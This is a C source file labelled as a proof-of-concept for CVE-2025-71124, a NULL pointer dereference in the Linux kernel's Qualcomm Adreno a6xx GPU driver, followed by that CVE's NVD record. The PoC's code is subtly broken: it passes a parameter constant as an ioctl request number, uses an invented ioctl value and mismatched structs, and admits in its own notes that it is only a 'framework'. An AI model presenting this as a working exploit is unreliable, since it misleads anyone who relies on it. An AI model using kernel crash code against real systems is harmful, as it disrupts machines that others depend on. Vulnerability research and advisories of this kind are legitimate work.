CVE-2025-71124

/* * PoC for CVE-2025-71124: Linux kernel drm/msm/a6xx NULL pointer dereference * This is a local DoS PoC that triggers the vulnerability through GPU operations. * * Note: This requires a system with Qualcomm Adreno A6xx GPU and modified * environment to trigger the specific failure condition in preempt_postamble_ptr. * * Compile: gcc -o cve202571124_poc cve202571124_poc.c -lpthread * Run: sudo ./cve202571124_poc * * Author: Security Researcher * Date: 2026-01-14 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sys/ioctl.h> #define DRM_IOCTL_MSM_GEM_SUBMIT 0x09 #define MSM_PARAM_GPU_ID 0x08 struct drm_msm_gem_submit { unsigned int flags; int nr_bos; int nr_cmds; unsigned long bos; unsigned long cmds; }; struct drm_msm_gem_submit_bo { unsigned long handle; unsigned long flags; unsigned long offset; }; int trigger_gpu_preemption_failure(int drm_fd) { /* * This PoC attempts to trigger the NULL pointer dereference by: * 1. Opening the DRM device with a6xx GPU * 2. Submitting GPU commands that trigger preemption * 3. Manipulating memory conditions to cause postamble allocation failure * * In a vulnerable kernel, this leads to NULL pointer dereference in * preempt_prepare_postamble() when preempt_postamble_ptr is NULL. */ printf("[*] Attempting to trigger CVE-2025-71124...\n"); printf("[*] Target: drm/msm/a6xx preempt_preamble_postamble NULL check\n"); /* * The actual exploitation requires: * - A system with Qualcomm Adreno A6xx GPU * - Ability to manipulate GEM objects and command submission * - Triggering memory pressure to cause postamble allocation failure * * This is a simplified demonstration structure. * Full exploitation requires kernel debugging and memory manipulation. */ int result = ioctl(drm_fd, MSM_PARAM_GPU_ID, NULL); if (result < 0) { printf("[!] Failed to query GPU ID: %s\n", strerror(errno)); return -1; } printf("[+] GPU ID retrieved, device may be vulnerable\n"); printf("[*] Full exploitation requires specific GPU command submission\n"); printf("[*] Check dmesg for kernel oops after triggering preemption\n"); return 0; } int main(int argc, char *argv[]) { int drm_fd; const char *device_paths[] = { "/dev/dri/card0", "/dev/dri/card1", "/dev/dri/renderD128", NULL }; printf("=== CVE-2025-71124 PoC ===\n"); printf("Linux kernel drm/msm/a6xx NULL pointer dereference\n\n"); for (int i = 0; device_paths[i] != NULL; i++) { drm_fd = open(device_paths[i], O_RDWR); if (drm_fd >= 0) { printf("[*] Opened %s\n", device_paths[i]); trigger_gpu_preemption_failure(drm_fd); close(drm_fd); } } printf("\n[*] Note: This PoC is a framework. Full exploitation requires:\n"); printf(" - Specific a6xx GPU hardware\n"); printf(" - Memory manipulation to cause postamble alloc failure\n"); printf(" - GPU command buffer crafting\n"); return 0; }

{"cve": {"id": "CVE-2025-71124", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:02.110", "lastModified": "2026-03-25T18:48:10.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/a6xx: move preempt_prepare_postamble after error check\n\nMove the call to preempt_prepare_postamble() after verifying that\npreempt_postamble_ptr is valid. If preempt_postamble_ptr is NULL,\ndereferencing it in preempt_prepare_postamble() would lead to a crash.\n\nThis change avoids calling the preparation function when the\npostamble allocation has failed, preventing potential NULL pointer\ndereference and ensuring proper error handling.\n\nPatchwork: https://patchwork.freedesktop.org/patch/687659/"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ndrm/msm/a6xx: mover preempt_prepare_postamble después de la verificación de errores\n\nMover la llamada a preempt_prepare_postamble() después de verificar que preempt_postamble_ptr es válido. Si preempt_postamble_ptr es NULL, desreferenciarlo en preempt_prepare_postamble() llevaría a un fallo.\n\nEste cambio evita llamar a la función de preparación cuando la asignación del postámbulo ha fallado, previniendo la desreferencia potencial de puntero NULL y asegurando un manejo de errores adecuado.\n\nPatchwork: https://patchwork.freedesktop.org/patch/687659/"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.3", "matchCriteriaId": "1175098E-51C5-4022-AD0A-C8985F2787C6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": "5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2c46497eb148ec61909f4101b8443f3c4c2daaec", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ef3b04091fd8bc737dc45312375df8625b8318e2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}